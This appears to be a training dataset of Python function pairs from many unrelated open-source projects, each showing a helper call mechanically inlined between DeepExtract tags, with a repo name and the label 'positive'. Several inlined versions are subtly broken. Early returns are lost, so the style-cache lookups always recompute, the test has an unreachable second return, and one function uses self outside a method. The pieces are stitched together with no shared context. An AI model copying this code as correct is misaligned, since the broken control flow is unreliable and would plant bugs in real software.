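A simplified, self-contained sketch of the element-to-dict conversion pattern exercised above, parsing the XML once into an element and walking it recursively; the names are illustrative and this is not bandit's helper:
import collections
import xml.etree.ElementTree as ET
def xml_to_dict(elem):
    # Recursively convert an ElementTree element into nested dicts,
    # prefixing attributes with '@' and keeping element text under '#text'.
    d = {elem.tag: {} if elem.attrib else None}
    children = list(elem)
    if children:
        dd = collections.defaultdict(list)
        for child in map(xml_to_dict, children):
            for k, v in child.items():
                dd[k].append(v)
        d = {elem.tag: {k: v[0] if len(v) == 1 else v for k, v in dd.items()}}
    if elem.attrib:
        d[elem.tag].update(('@' + k, v) for k, v in elem.attrib.items())
    if elem.text and elem.text.strip():
        text = elem.text.strip()
        if children or elem.attrib:
            d[elem.tag]['#text'] = text
        else:
            d[elem.tag] = text
    return d
root = ET.XML('<testsuite><testcase classname="t"><error message="m"/></testcase></testsuite>')
print(xml_to_dict(root))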
def PUT(self, req, rep):
<DeepExtract>
req['client_id'] = 'test'
req['path'] = '/'.join([''] + req.get('trail', []))
if self.authz.handle(req) is False:
raise HTTPError(403)
</DeepExtract>
self.secrets.PUT(req, rep)
|
def PUT(self, req, rep):
req['client_id'] = 'test'
req['path'] = '/'.join([''] + req.get('trail', []))
if self.authz.handle(req) is False:
raise HTTPError(403)
self.secrets.PUT(req, rep)
|
custodia
|
positive
|
def __dict__(self):
"""
prepares a dictionary to return for jsonification with the api
"""
mode = self.mode
sources = {}
edges = []
<DeepExtract>
self._mode = DRSMode.FIELDS
</DeepExtract>
for x in self:
table = x.source_name
if not sources.get(table, None):
source_res = x.__dict__()
sources[table] = {'source_res': source_res, 'field_res': []}
sources[table]['field_res'].append(x.__dict__())
for edge in self.get_provenance().prov_graph().edges():
origin = edge[0].__dict__()
destination = edge[1].__dict__()
edges.append((origin, destination))
self._mode = mode
return {'sources': sources, 'edges': edges}
|
def __dict__(self):
"""
prepares a dictionary to return for jsonification with the api
"""
mode = self.mode
sources = {}
edges = []
self._mode = DRSMode.FIELDS
for x in self:
table = x.source_name
if not sources.get(table, None):
source_res = x.__dict__()
sources[table] = {'source_res': source_res, 'field_res': []}
sources[table]['field_res'].append(x.__dict__())
for edge in self.get_provenance().prov_graph().edges():
origin = edge[0].__dict__()
destination = edge[1].__dict__()
edges.append((origin, destination))
self._mode = mode
return {'sources': sources, 'edges': edges}
|
aurum-datadiscovery
|
positive
|
def _set_fields(self, val):
<DeepExtract>
if 'fields' in 'field_names':
self._validate_field_names(val)
elif 'fields' in ('start', 'end', 'max_width', 'padding_width', 'left_padding_width', 'right_padding_width', 'format'):
self._validate_nonnegative_int('fields', val)
elif 'fields' in 'sortby':
self._validate_field_name('fields', val)
elif 'fields' in 'sort_key':
self._validate_function('fields', val)
elif 'fields' in 'hrules':
self._validate_hrules('fields', val)
elif 'fields' in 'vrules':
self._validate_vrules('fields', val)
elif 'fields' in 'fields':
self._validate_all_field_names('fields', val)
elif 'fields' in ('header', 'border', 'reversesort', 'xhtml', 'print_empty'):
self._validate_true_or_false('fields', val)
elif 'fields' in 'header_style':
self._validate_header_style(val)
elif 'fields' in 'int_format':
self._validate_int_format('fields', val)
elif 'fields' in 'float_format':
self._validate_float_format('fields', val)
elif 'fields' in ('vertical_char', 'horizontal_char', 'junction_char'):
self._validate_single_char('fields', val)
elif 'fields' in 'attributes':
self._validate_attributes('fields', val)
else:
raise Exception('Unrecognised option: %s!' % 'fields')
</DeepExtract>
self._fields = val
|
def _set_fields(self, val):
if 'fields' in 'field_names':
self._validate_field_names(val)
elif 'fields' in ('start', 'end', 'max_width', 'padding_width', 'left_padding_width', 'right_padding_width', 'format'):
self._validate_nonnegative_int('fields', val)
elif 'fields' in 'sortby':
self._validate_field_name('fields', val)
elif 'fields' in 'sort_key':
self._validate_function('fields', val)
elif 'fields' in 'hrules':
self._validate_hrules('fields', val)
elif 'fields' in 'vrules':
self._validate_vrules('fields', val)
elif 'fields' in 'fields':
self._validate_all_field_names('fields', val)
elif 'fields' in ('header', 'border', 'reversesort', 'xhtml', 'print_empty'):
self._validate_true_or_false('fields', val)
elif 'fields' in 'header_style':
self._validate_header_style(val)
elif 'fields' in 'int_format':
self._validate_int_format('fields', val)
elif 'fields' in 'float_format':
self._validate_float_format('fields', val)
elif 'fields' in ('vertical_char', 'horizontal_char', 'junction_char'):
self._validate_single_char('fields', val)
elif 'fields' in 'attributes':
self._validate_attributes('fields', val)
else:
raise Exception('Unrecognised option: %s!' % 'fields')
self._fields = val
|
C--Compiler
|
positive
|
def format_unencoded(self, tokensource, outfile):
"""
Format ``tokensource``, an iterable of ``(tokentype, tokenstring)``
tuples and write it into ``outfile``.
For our implementation we put all lines in their own 'line group'.
"""
x = self.xoffset
y = self.yoffset
if not self.nowrap:
if self.encoding:
outfile.write('<?xml version="1.0" encoding="%s"?>\n' % self.encoding)
else:
outfile.write('<?xml version="1.0"?>\n')
outfile.write('<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.0//EN" "http://www.w3.org/TR/2001/REC-SVG-20010904/DTD/svg10.dtd">\n')
outfile.write('<svg xmlns="http://www.w3.org/2000/svg">\n')
outfile.write('<g font-family="%s" font-size="%s">\n' % (self.fontfamily, self.fontsize))
counter = self.linenostart
counter_step = self.linenostep
<DeepExtract>
if Comment in self._stylecache:
counter_style = self._stylecache[Comment]
otokentype = Comment
while not self.style.styles_token(Comment):
Comment = Comment.parent
value = self.style.style_for_token(Comment)
result = ''
if value['color']:
result = ' fill="#' + value['color'] + '"'
if value['bold']:
result += ' font-weight="bold"'
if value['italic']:
result += ' font-style="italic"'
self._stylecache[otokentype] = result
counter_style = result
</DeepExtract>
line_x = x
if self.linenos:
if counter % counter_step == 0:
outfile.write('<text x="%s" y="%s" %s text-anchor="end">%s</text>' % (x + self.linenowidth, y, counter_style, counter))
line_x += self.linenowidth + self.ystep
counter += 1
outfile.write('<text x="%s" y="%s" xml:space="preserve">' % (line_x, y))
for (ttype, value) in tokensource:
<DeepExtract>
if ttype in self._stylecache:
style = self._stylecache[ttype]
otokentype = ttype
while not self.style.styles_token(ttype):
ttype = ttype.parent
value = self.style.style_for_token(ttype)
result = ''
if value['color']:
result = ' fill="#' + value['color'] + '"'
if value['bold']:
result += ' font-weight="bold"'
if value['italic']:
result += ' font-style="italic"'
self._stylecache[otokentype] = result
style = result
</DeepExtract>
tspan = style and '<tspan' + style + '>' or ''
tspanend = tspan and '</tspan>' or ''
<DeepExtract>
value = value.replace('&', '&amp;').replace('<', '&lt;').replace('>', '&gt;').replace('"', '&quot;').replace("'", '&#39;')
</DeepExtract>
if self.spacehack:
value = value.expandtabs().replace(' ', '&#160;')
parts = value.split('\n')
for part in parts[:-1]:
outfile.write(tspan + part + tspanend)
y += self.ystep
outfile.write('</text>\n')
if self.linenos and counter % counter_step == 0:
outfile.write('<text x="%s" y="%s" text-anchor="end" %s>%s</text>' % (x + self.linenowidth, y, counter_style, counter))
counter += 1
outfile.write('<text x="%s" y="%s" xml:space="preserve">' % (line_x, y))
outfile.write(tspan + parts[-1] + tspanend)
outfile.write('</text>')
if not self.nowrap:
outfile.write('</g></svg>\n')
|
def format_unencoded(self, tokensource, outfile):
"""
Format ``tokensource``, an iterable of ``(tokentype, tokenstring)``
tuples and write it into ``outfile``.
For our implementation we put all lines in their own 'line group'.
"""
x = self.xoffset
y = self.yoffset
if not self.nowrap:
if self.encoding:
outfile.write('<?xml version="1.0" encoding="%s"?>\n' % self.encoding)
else:
outfile.write('<?xml version="1.0"?>\n')
outfile.write('<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.0//EN" "http://www.w3.org/TR/2001/REC-SVG-20010904/DTD/svg10.dtd">\n')
outfile.write('<svg xmlns="http://www.w3.org/2000/svg">\n')
outfile.write('<g font-family="%s" font-size="%s">\n' % (self.fontfamily, self.fontsize))
counter = self.linenostart
counter_step = self.linenostep
if Comment in self._stylecache:
counter_style = self._stylecache[Comment]
otokentype = Comment
while not self.style.styles_token(Comment):
Comment = Comment.parent
value = self.style.style_for_token(Comment)
result = ''
if value['color']:
result = ' fill="#' + value['color'] + '"'
if value['bold']:
result += ' font-weight="bold"'
if value['italic']:
result += ' font-style="italic"'
self._stylecache[otokentype] = result
counter_style = result
line_x = x
if self.linenos:
if counter % counter_step == 0:
outfile.write('<text x="%s" y="%s" %s text-anchor="end">%s</text>' % (x + self.linenowidth, y, counter_style, counter))
line_x += self.linenowidth + self.ystep
counter += 1
outfile.write('<text x="%s" y="%s" xml:space="preserve">' % (line_x, y))
for (ttype, value) in tokensource:
if ttype in self._stylecache:
style = self._stylecache[ttype]
otokentype = ttype
while not self.style.styles_token(ttype):
ttype = ttype.parent
value = self.style.style_for_token(ttype)
result = ''
if value['color']:
result = ' fill="#' + value['color'] + '"'
if value['bold']:
result += ' font-weight="bold"'
if value['italic']:
result += ' font-style="italic"'
self._stylecache[otokentype] = result
style = result
tspan = style and '<tspan' + style + '>' or ''
tspanend = tspan and '</tspan>' or ''
value = value.replace('&', '&amp;').replace('<', '&lt;').replace('>', '&gt;').replace('"', '&quot;').replace("'", '&#39;')
if self.spacehack:
value = value.expandtabs().replace(' ', '&#160;')
parts = value.split('\n')
for part in parts[:-1]:
outfile.write(tspan + part + tspanend)
y += self.ystep
outfile.write('</text>\n')
if self.linenos and counter % counter_step == 0:
outfile.write('<text x="%s" y="%s" text-anchor="end" %s>%s</text>' % (x + self.linenowidth, y, counter_style, counter))
counter += 1
outfile.write('<text x="%s" y="%s" xml:space="preserve">' % (line_x, y))
outfile.write(tspan + parts[-1] + tspanend)
outfile.write('</text>')
if not self.nowrap:
outfile.write('</g></svg>\n')
|
diaphora
|
positive
|
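The escape chain reconstructed above mirrors what the standard library already provides; a quick standalone comparison with html.escape (which uses &#x27; rather than &#39; for the single quote, so the outputs differ only in that entity):
import html
sample = 'if a < b & c > "d": print(\'ok\')'
manual = (sample.replace('&', '&amp;')
                .replace('<', '&lt;')
                .replace('>', '&gt;')
                .replace('"', '&quot;')
                .replace("'", '&#39;'))
print(manual)
print(html.escape(sample, quote=True))  # same idea, different entity for the single quote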
def check_pareto(Y, obj_type=None):
"""
Check pareto optimality of the input performance data
"""
<DeepExtract>
if obj_type is None:
Y = Y
if isinstance(obj_type, str):
obj_type = [obj_type] * Y.shape[1]
assert isinstance(obj_type, Iterable), f'Objective type {type(obj_type)} is not supported'
maxm_idx = np.array(obj_type) == 'max'
Y = Y.copy()
Y[:, maxm_idx] = -Y[:, maxm_idx]
Y = Y
</DeepExtract>
sorted_indices = np.argsort(Y.T[0])
pareto = np.zeros(len(Y), dtype=bool)
for idx in sorted_indices:
if not np.logical_and((Y <= Y[idx]).all(axis=1), (Y < Y[idx]).any(axis=1)).any():
pareto[idx] = True
return pareto
|
def check_pareto(Y, obj_type=None):
"""
Check pareto optimality of the input performance data
"""
if obj_type is None:
Y = Y
if isinstance(obj_type, str):
obj_type = [obj_type] * Y.shape[1]
assert isinstance(obj_type, Iterable), f'Objective type {type(obj_type)} is not supported'
maxm_idx = np.array(obj_type) == 'max'
Y = Y.copy()
Y[:, maxm_idx] = -Y[:, maxm_idx]
Y = Y
sorted_indices = np.argsort(Y.T[0])
pareto = np.zeros(len(Y), dtype=bool)
for idx in sorted_indices:
if not np.logical_and((Y <= Y[idx]).all(axis=1), (Y < Y[idx]).any(axis=1)).any():
pareto[idx] = True
return pareto
|
AutoOED
|
positive
|
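A self-contained sketch of the same Pareto-dominance test for a minimization problem on a small 2-objective NumPy array; the obj_type handling above is dropped, so this is an illustration rather than AutoOED's function:
import numpy as np
def pareto_mask(Y):
    # True where no other row dominates (all objectives <= and at least one strictly <).
    pareto = np.zeros(len(Y), dtype=bool)
    for idx in np.argsort(Y.T[0]):
        dominated = np.logical_and((Y <= Y[idx]).all(axis=1),
                                   (Y < Y[idx]).any(axis=1)).any()
        pareto[idx] = not dominated
    return pareto
Y = np.array([[1.0, 4.0],   # non-dominated
              [2.0, 2.0],   # non-dominated
              [3.0, 3.0],   # dominated by [2, 2]
              [4.0, 1.0]])  # non-dominated
print(pareto_mask(Y))  # [ True  True False  True]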
def convert_image_to_node(image, input_node=None):
from keras.preprocessing.image import img_to_array
if input_node is None:
<DeepExtract>
config = self.job['config']
input_node = self.layers[0][0]
</DeepExtract>
if input_node['inputType'] == 'image':
image = image.convert('L')
image = img_to_array(image)
elif input_node['inputType'] == 'image_bgr':
image = image.convert('RGB')
image = np.asarray(image, dtype='float32')
image = image[:, :, ::-1].copy()
image = img_to_array(image)
else:
image = image.convert('RGB')
image = img_to_array(image)
if 'imageScale' not in input_node:
input_node['imageScale'] = 255
if float(input_node['imageScale']) > 0:
image = image / float(input_node['imageScale'])
return image
|
def convert_image_to_node(image, input_node=None):
from keras.preprocessing.image import img_to_array
if input_node is None:
config = self.job['config']
input_node = self.layers[0][0]
if input_node['inputType'] == 'image':
image = image.convert('L')
image = img_to_array(image)
elif input_node['inputType'] == 'image_bgr':
image = image.convert('RGB')
image = np.asarray(image, dtype='float32')
image = image[:, :, ::-1].copy()
image = img_to_array(image)
else:
image = image.convert('RGB')
image = img_to_array(image)
if 'imageScale' not in input_node:
input_node['imageScale'] = 255
if float(input_node['imageScale']) > 0:
image = image / float(input_node['imageScale'])
return image
|
aetros-cli
|
positive
|
def run_dask_function(config):
"""Start a Dask Cluster using dask-kubernetes and run a function.
Talks to kubernetes to create `n` amount of new `pods` with a dask worker inside of each
forming a `dask` cluster. Then, a function specified from `config` is being imported and
run with the given arguments. The tasks created by this `function` are being run on the
`dask` cluster for distributed computation.
The config dict must contain the following sections:
* run
* dask_cluster
* output
Args:
config (dict):
Config dictionary.
"""
output_conf = config.get('output')
if output_conf:
path = output_conf.get('path')
if not path:
raise ValueError('An output path must be provided when providing `output`.')
<DeepExtract>
extra_setup = ''
dask_cluster = config['dask_cluster']
metadata = {}
worker_config = dask_cluster.get('worker_config')
if worker_config.get('setup'):
extra_setup = _get_extra_setup(worker_config['setup'])
if False:
name = worker_config.get('image', 'daskdev/dask:latest')
name = '{}-'.format(re.sub('[\\W_]', '-', name))
metadata['generateName'] = name
config_command = CONFIG_TEMPLATE.format(json.dumps(config))
run_command = 'python -u -m btb_benchmark.kubernetes config.json'
extra_setup = '\n'.join([extra_setup, config_command, run_command])
else:
run_command = WORKER_COMM
extra_setup = '\n'.join([extra_setup, run_command])
run_commands = RUN_TEMPLATE.format(extra_setup)
spec = {'metadata': metadata, 'spec': {'restartPolicy': 'Never', 'containers': [{'args': ['-c', run_commands], 'command': ['tini', '-g', '--', '/bin/sh'], 'image': worker_config.get('image', 'daskdev/dask:latest'), 'name': 'dask-worker', 'resources': worker_config.get('resources', {})}]}}
cluster_spec = spec
</DeepExtract>
cluster = KubeCluster.from_dict(cluster_spec)
workers = config['dask_cluster'].get('workers')
if not workers:
cluster.adapt()
elif isinstance(workers, int):
cluster.scale(workers)
else:
cluster.adapt(**workers)
client = Client(cluster)
client.get_versions(check=True)
try:
<DeepExtract>
function = config['run']['function']
function = function.split('.')
function_name = function[-1]
package = '.'.join(function[:-1])
module = importlib.import_module(package)
run = getattr(module, function_name)
</DeepExtract>
kwargs = config['run']['args']
results = run(**kwargs)
finally:
client.close()
cluster.close()
if output_conf:
bucket = output_conf.get('bucket')
try:
if bucket:
aws_key = output_conf.get('key')
aws_secret = output_conf.get('secret_key')
<DeepExtract>
client = boto3.client('s3', aws_access_key_id=aws_key, aws_secret_access_key=aws_secret)
client.put_object(Bucket=bucket, Key=path, Body=_df_to_csv_str(results))
</DeepExtract>
else:
os.makedirs(os.path.dirname(path), exist_ok=True)
results.to_csv(path)
except Exception:
print('Error storing results. Falling back to console dump.')
print(_df_to_csv_str(results))
else:
return results
|
def run_dask_function(config):
"""Start a Dask Cluster using dask-kubernetes and run a function.
Talks to kubernetes to create `n` amount of new `pods` with a dask worker inside of each
forming a `dask` cluster. Then, a function specified from `config` is being imported and
run with the given arguments. The tasks created by this `function` are being run on the
`dask` cluster for distributed computation.
The config dict must contain the following sections:
* run
* dask_cluster
* output
Args:
config (dict):
Config dictionary.
"""
output_conf = config.get('output')
if output_conf:
path = output_conf.get('path')
if not path:
raise ValueError('An output path must be provided when providing `output`.')
extra_setup = ''
dask_cluster = config['dask_cluster']
metadata = {}
worker_config = dask_cluster.get('worker_config')
if worker_config.get('setup'):
extra_setup = _get_extra_setup(worker_config['setup'])
if False:
name = worker_config.get('image', 'daskdev/dask:latest')
name = '{}-'.format(re.sub('[\\W_]', '-', name))
metadata['generateName'] = name
config_command = CONFIG_TEMPLATE.format(json.dumps(config))
run_command = 'python -u -m btb_benchmark.kubernetes config.json'
extra_setup = '\n'.join([extra_setup, config_command, run_command])
else:
run_command = WORKER_COMM
extra_setup = '\n'.join([extra_setup, run_command])
run_commands = RUN_TEMPLATE.format(extra_setup)
spec = {'metadata': metadata, 'spec': {'restartPolicy': 'Never', 'containers': [{'args': ['-c', run_commands], 'command': ['tini', '-g', '--', '/bin/sh'], 'image': worker_config.get('image', 'daskdev/dask:latest'), 'name': 'dask-worker', 'resources': worker_config.get('resources', {})}]}}
cluster_spec = spec
cluster = KubeCluster.from_dict(cluster_spec)
workers = config['dask_cluster'].get('workers')
if not workers:
cluster.adapt()
elif isinstance(workers, int):
cluster.scale(workers)
else:
cluster.adapt(**workers)
client = Client(cluster)
client.get_versions(check=True)
try:
function = config['run']['function']
function = function.split('.')
function_name = function[-1]
package = '.'.join(function[:-1])
module = importlib.import_module(package)
run = getattr(module, function_name)
kwargs = config['run']['args']
results = run(**kwargs)
finally:
client.close()
cluster.close()
if output_conf:
bucket = output_conf.get('bucket')
try:
if bucket:
aws_key = output_conf.get('key')
aws_secret = output_conf.get('secret_key')
client = boto3.client('s3', aws_access_key_id=aws_key, aws_secret_access_key=aws_secret)
client.put_object(Bucket=bucket, Key=path, Body=_df_to_csv_str(results))
else:
os.makedirs(os.path.dirname(path), exist_ok=True)
results.to_csv(path)
except Exception:
print('Error storing results. Falling back to console dump.')
print(_df_to_csv_str(results))
else:
return results
|
BTB
|
positive
|
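The function-import step above (splitting a dotted path and resolving it with importlib) can be exercised on its own; a minimal sketch with a standard-library target, not BTB's kubernetes entry point:
import importlib
def import_function(dotted_path):
    # 'package.module.func' -> callable, mirroring the lookup in run_dask_function.
    parts = dotted_path.split('.')
    module = importlib.import_module('.'.join(parts[:-1]))
    return getattr(module, parts[-1])
json_dumps = import_function('json.dumps')
print(json_dumps({'workers': 4}))  # {"workers": 4}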
def _get_gradient(self, out_pattern, expected=None):
"""
computing the gradient of log likelihood
Parameters
----------
out_pattern : array, length out_dim
out_pattern, where gradient is computed
Returns
-------
gradient : dict of arrays
dictionary with name of a variable as a key
"""
assert out_pattern.shape == (self.out_dim,), 'out_pattern must have shape (out_dim,)'
if expected is not None:
assert expected.shape == (self.out_dim,), 'expected must have shape (out_dim,)'
gradient = GaussianDyBM._get_gradient(self, out_pattern)
if expected is None:
<DeepExtract>
mu = VectorRegressionWithVariance._get_mean(self)
for k in range(self.n_etrace):
mu = mu + self.e_trace[k, :].dot(self.variables['V'][k])
expected = mu
</DeepExtract>
dx = (out_pattern - expected) / self.variables['s'] ** 2
dx = dx.ravel()
temp_si = self.si.reshape((self.rnn_dim, 1))
temp_dx = dx.reshape((self.out_dim, 1))
gradient['A'] = amath.dot(temp_dx, amath.transpose(temp_si))
self.SGD.apply_L2_regularization(gradient, self.variables, self.L2)
return gradient
|
def _get_gradient(self, out_pattern, expected=None):
"""
computing the gradient of log likelihood
Parameters
----------
out_pattern : array, length out_dim
out_pattern, where gradient is computed
Returns
-------
gradient : dict of arrays
dictionary with name of a variable as a key
"""
assert out_pattern.shape == (self.out_dim,), 'out_pattern must have shape (out_dim,)'
if expected is not None:
assert expected.shape == (self.out_dim,), 'expected must have shape (out_dim,)'
gradient = GaussianDyBM._get_gradient(self, out_pattern)
if expected is None:
mu = VectorRegressionWithVariance._get_mean(self)
for k in range(self.n_etrace):
mu = mu + self.e_trace[k, :].dot(self.variables['V'][k])
expected = mu
dx = (out_pattern - expected) / self.variables['s'] ** 2
dx = dx.ravel()
temp_si = self.si.reshape((self.rnn_dim, 1))
temp_dx = dx.reshape((self.out_dim, 1))
gradient['A'] = amath.dot(temp_dx, amath.transpose(temp_si))
self.SGD.apply_L2_regularization(gradient, self.variables, self.L2)
return gradient
|
dybm
|
positive
|
def discretize_1d_monomial(n: int, points: List[float]) -> np.ndarray:
"""Discretize the differential operator d^n/dx^n as a convolutional kernel."""
key = (n, tuple(points))
if key not in _1D_KERNEL_CACHE:
assert n < len(points), f"Can't discretize differential operator of order {n} on {len(points)} points, at least {n + 1} points are needed"
<DeepExtract>
weights = finite_diff_weights(n, points, 0)
_1D_KERNEL_CACHE[key] = np.array(weights[-1][-1], dtype=float)
</DeepExtract>
return _1D_KERNEL_CACHE[key]
|
def discretize_1d_monomial(n: int, points: List[float]) -> np.ndarray:
"""Discretize the differential operator d^n/dx^n as a convolutional kernel."""
key = (n, tuple(points))
if key not in _1D_KERNEL_CACHE:
assert n < len(points), f"Can't discretize differential operator of order {n} on {len(points)} points, at least {n + 1} points are needed"
weights = finite_diff_weights(n, points, 0)
_1D_KERNEL_CACHE[key] = np.array(weights[-1][-1], dtype=float)
return _1D_KERNEL_CACHE[key]
|
e2cnn
|
positive
|
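A quick standalone check of the finite-difference weights used above, assuming SymPy is available; for d/dx on the stencil [-1, 0, 1] the highest-order entry gives the familiar central-difference kernel:
import numpy as np
from sympy import finite_diff_weights
n = 1                # first derivative
points = [-1, 0, 1]  # symmetric 3-point stencil
weights = finite_diff_weights(n, points, 0)
# weights[-1][-1] holds the order-n weights computed from all the points.
kernel = np.array(weights[-1][-1], dtype=float)
print(kernel)  # [-0.5  0.   0.5]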
@property
def timestamp(self):
if self._timestamp is None:
<DeepExtract>
res = self._api.info(self.hash)
data = res['info'][0]
if len(res['info']) > 1:
print('More than one info for this link, weird')
self._timestamp = datetime.datetime.fromtimestamp(data['created_at'])
if data['global_hash'] == self.hash:
self._is_aggregate = True
else:
self._is_aggregate = False
self._aggregate = Link(self._api, data['global_hash'])
self._title = data['title']
self._user_hash = data['user_hash']
</DeepExtract>
return self._timestamp
|
@property
def timestamp(self):
if self._timestamp is None:
res = self._api.info(self.hash)
data = res['info'][0]
if len(res['info']) > 1:
print('More than one info for this link, weird')
self._timestamp = datetime.datetime.fromtimestamp(data['created_at'])
if data['global_hash'] == self.hash:
self._is_aggregate = True
else:
self._is_aggregate = False
self._aggregate = Link(self._api, data['global_hash'])
self._title = data['title']
self._user_hash = data['user_hash']
return self._timestamp
|
analyst-scripts
|
positive
|
def test_zero(self):
<DeepExtract>
return super(InstanceOf, self).assert_match(__unit__.InstanceOf(int, exact), 0)
</DeepExtract>
<DeepExtract>
return super(InstanceOf, self).assert_no_match(__unit__.InstanceOf(self.Class, exact), 0)
</DeepExtract>
|
def test_zero(self):
return super(InstanceOf, self).assert_match(__unit__.InstanceOf(int, exact), 0)
return super(InstanceOf, self).assert_no_match(__unit__.InstanceOf(self.Class, exact), 0)
|
callee
|
positive
|
def _populate_invalid_response_status(self, query):
self.response_errors[query] = []
for error_info in query.error_info:
for (server, client) in error_info.servers_clients:
for response in error_info.servers_clients[server, client]:
if error_info.code == Q.RESPONSE_ERROR_NETWORK_ERROR:
Errors.DomainNameAnalysisError.insert_into_list(Errors.NetworkError(tcp=response.effective_tcp, errno=errno.errorcode.get(error_info.arg, 'UNKNOWN')), self.response_errors[query], server, client, response)
if error_info.code == Q.RESPONSE_ERROR_FORMERR:
Errors.DomainNameAnalysisError.insert_into_list(Errors.FormError(tcp=response.effective_tcp, msg_size=response.msg_size), self.response_errors[query], server, client, response)
elif error_info.code == Q.RESPONSE_ERROR_TIMEOUT:
attempts = 1
for i in range(len(response.history) - 1, -1, -1):
if response.history[i].action in (Q.RETRY_ACTION_USE_TCP, Q.RETRY_ACTION_USE_UDP):
break
attempts += 1
Errors.DomainNameAnalysisError.insert_into_list(Errors.Timeout(tcp=response.effective_tcp, attempts=attempts), self.response_errors[query], server, client, response)
elif error_info.code == Q.RESPONSE_ERROR_INVALID_RCODE:
if response.effective_edns >= 0 and response.message.edns < 0 and (response.message.rcode() in (dns.rcode.FORMERR, dns.rcode.SERVFAIL, dns.rcode.NOTIMP)):
pass
elif response.effective_edns >= 0 and response.message.edns >= 0 and (response.message.rcode() == dns.rcode.BADVERS):
pass
else:
Errors.DomainNameAnalysisError.insert_into_list(Errors.InvalidRcode(tcp=response.effective_tcp, rcode=dns.rcode.to_text(response.message.rcode())), self.response_errors[query], server, client, response)
elif error_info.code == Q.RESPONSE_ERROR_OTHER:
Errors.DomainNameAnalysisError.insert_into_list(Errors.UnknownResponseError(tcp=response.effective_tcp), self.response_errors[query], server, client, response)
self.response_warnings[query] = []
for referral_info in query.referral_info:
for (server, client) in referral_info.servers_clients:
for response in referral_info.servers_clients[server, client]:
if response.is_authoritative():
Errors.DomainNameAnalysisError.insert_into_list(Errors.AuthoritativeReferral(), self.response_warnings[query], server, client, response)
for truncated_info in query.truncated_info:
for (server, client) in truncated_info.servers_clients:
for response in truncated_info.servers_clients[server, client]:
<DeepExtract>
change_err = None
if response.responsive_cause_index is not None:
retry = response.history[response.responsive_cause_index]
cause_err_class = None
action_err_class = None
cause_err_kwargs = {'tcp': response.responsive_cause_index_tcp}
action_err_kwargs = {}
require_valid = False
dnssec_downgrade_class = None
if retry.cause == Q.RETRY_CAUSE_NETWORK_ERROR:
cause_err_class = Errors.NetworkError
cause_err_kwargs['errno'] = errno.errorcode.get(retry.cause_arg, 'UNKNOWN')
require_valid = False
elif retry.cause == Q.RETRY_CAUSE_FORMERR:
cause_err_class = Errors.FormError
cause_err_kwargs['msg_size'] = response.msg_size
require_valid = True
elif retry.cause == Q.RETRY_CAUSE_TIMEOUT:
cause_err_class = Errors.Timeout
cause_err_kwargs['attempts'] = response.responsive_cause_index + 1
require_valid = False
elif retry.cause == Q.RETRY_CAUSE_RCODE:
if retry.cause_arg in (dns.rcode.FORMERR, dns.rcode.SERVFAIL, dns.rcode.NOTIMP) and self is not None and self.zone.signed:
dnssec_downgrade_class = Errors.DNSSECDowngradeEDNSDisabled
if retry.cause_arg in (dns.rcode.FORMERR, dns.rcode.SERVFAIL, dns.rcode.NOTIMP) and retry.action == Q.RETRY_ACTION_DISABLE_EDNS and (not (self is not None and self.zone.signed)):
pass
elif retry.cause_arg == dns.rcode.BADVERS and retry.action == Q.RETRY_ACTION_CHANGE_EDNS_VERSION:
pass
elif retry.cause_arg == dns.rcode.SERVFAIL and retry.action == Q.RETRY_ACTION_SET_FLAG and (retry.action_arg == dns.flags.CD):
pass
elif retry.cause_arg == 23 and response.server_cookie_status in (Q.DNS_COOKIE_CLIENT_COOKIE_ONLY, Q.DNS_COOKIE_SERVER_COOKIE_BAD) and (retry.action == Q.RETRY_ACTION_UPDATE_DNS_COOKIE):
pass
if retry.cause_arg == dns.rcode.FORMERR and response.server_cookie_status == Q.DNS_COOKIE_IMPROPER_LENGTH and (retry.action == Q.RETRY_ACTION_DISABLE_EDNS or (retry.action == Q.RETRY_ACTION_REMOVE_EDNS_OPTION and retry.action_arg == 10)):
pass
else:
cause_err_class = Errors.InvalidRcode
cause_err_kwargs['rcode'] = dns.rcode.to_text(retry.cause_arg)
require_valid = True
elif retry.cause == Q.RETRY_CAUSE_OTHER:
require_valid = True
action_arg = retry.action_arg
if retry.action == Q.RETRY_ACTION_NO_CHANGE:
pass
elif retry.action == Q.RETRY_ACTION_CHANGE_SPORT:
pass
elif retry.action == Q.RETRY_ACTION_SET_FLAG:
action_err_class = Errors.ResponseErrorWithoutRequestFlag
action_err_kwargs['flag'] = dns.flags.to_text(retry.action_arg)
if not action_err_kwargs['flag']:
action_err_kwargs['flag'] = retry.action_arg
elif retry.action == Q.RETRY_ACTION_CLEAR_FLAG:
action_err_class = Errors.ResponseErrorWithRequestFlag
action_err_kwargs['flag'] = dns.flags.to_text(retry.action_arg)
if not action_err_kwargs['flag']:
action_err_kwargs['flag'] = retry.action_arg
elif retry.action == Q.RETRY_ACTION_DISABLE_EDNS:
action_err_class = Errors.ResponseErrorWithEDNS
dnssec_downgrade_class = Errors.DNSSECDowngradeEDNSDisabled
elif retry.action == Q.RETRY_ACTION_CHANGE_UDP_MAX_PAYLOAD:
action_err_class = Errors.PMTUExceeded
action_err_kwargs['pmtu_lower_bound'] = None
action_err_kwargs['pmtu_upper_bound'] = None
elif retry.action == Q.RETRY_ACTION_SET_EDNS_FLAG:
action_err_class = Errors.ResponseErrorWithoutEDNSFlag
action_err_kwargs['flag'] = dns.flags.edns_to_text(retry.action_arg)
if not action_err_kwargs['flag']:
action_err_kwargs['flag'] = retry.action_arg
elif retry.action == Q.RETRY_ACTION_CLEAR_EDNS_FLAG:
action_err_class = Errors.ResponseErrorWithEDNSFlag
action_err_kwargs['flag'] = dns.flags.edns_to_text(retry.action_arg)
if not action_err_kwargs['flag']:
action_err_kwargs['flag'] = retry.action_arg
if retry.action_arg == dns.flags.DO:
dnssec_downgrade_class = Errors.DNSSECDowngradeDOBitCleared
elif retry.action == Q.RETRY_ACTION_ADD_EDNS_OPTION:
action_err_class = Errors.ResponseErrorWithoutEDNSOption
action_err_kwargs['option'] = fmt.EDNS_OPT_DESCRIPTIONS.get(retry.action_arg, retry.action_arg)
elif retry.action == Q.RETRY_ACTION_REMOVE_EDNS_OPTION:
action_err_class = Errors.ResponseErrorWithEDNSOption
action_err_kwargs['option'] = fmt.EDNS_OPT_DESCRIPTIONS.get(retry.action_arg, retry.action_arg)
elif retry.action == Q.RETRY_ACTION_CHANGE_EDNS_VERSION:
action_err_class = Errors.ResponseErrorWithEDNSVersion
action_err_kwargs['edns_old'] = response.query.edns
